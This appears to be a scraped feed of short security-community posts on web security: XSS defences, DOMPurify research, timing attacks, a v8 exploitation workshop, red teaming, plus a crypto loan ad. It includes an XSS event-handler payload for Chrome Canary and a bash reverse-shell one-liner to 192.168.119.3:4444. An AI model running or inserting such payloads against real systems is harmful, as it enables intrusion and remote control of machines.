🔥The 9th Round of Easy Loan, Earn $40 Reward is in progress❗️ ⏰ Promotion Period: January 15th - Feburary 15th, 2025 👉 Register now and check more details at gate.io/campaigns/358

Красная команда, чёрный день: почему матерые пентестеры лажают в Red Team Даже опытные специалисты не всегда видят тонкие различия между пентестами и Red Team. Разница кроется в подходе к выявлению уязвимостей и оценке безопасности организации: u.habr.com/MGSnU

Are you buying CrowdStrike stock?

ooh, this works on Chrome Canary :D <input type="hidden" oncontentvisibilityautostatechange="alert(/ChromeCanary/)" style="content-visibility:auto">

hm, why I never used ??=? Nullish coalescing assignment (??=) developer.mozilla.org/en-US/docs/Web…

bash -i >& /dev/tcp/192.168.119.3/4444 0>&1

The dedication and hard work has payed off: "for hundreds of complex web applications that are built on Google’s hardened and safe-by-design frameworks, we've averaged less than one XSS report per year in total" (see page 9 of the whitepaper).

Did you know about Strict Mode? 🤔 ✨ "use strict"; ✨ Strict Mode catches silent errors, making your code more predictable and easier to debug. It also improves performance and helps you write more secure JavaScript code. See how 👇 developer.mozilla.org/en-US/docs/Web…

I'm thrilled to finally share my research on HTML parsing and DOMPurify at @GreHack 2024 📜 The research article is available here: mizu.re/post/exploring… The slides are available here: slides.com/kevin-mizu/gre… 1/3

We’re finally live! You can now watch “Listen to the whispers: web timing attacks that actually work” on YouTube: youtube.com/watch?v=zOPjz-…

Releasing full 2+hr video of my browser exploitation workshop from VXCON 2024: youtube.com/live/b9OhamkAY… In which I show what goes inside the mind of a skilled hacker while exploiting a highly non-trivial vulnerability in v8, from zero to exploit concept. Especially this workflow

Full results and write-up: plasticlist.org We also have instructions for running your own tests!

Developers, tired of DOM XSS in your web applications? 😩 We were too. See how we refactored our code to solve Trusted Types violations in Gmail & AppSheet. Your guide to a safer web is here! bughunters.google.com/blog/585078655…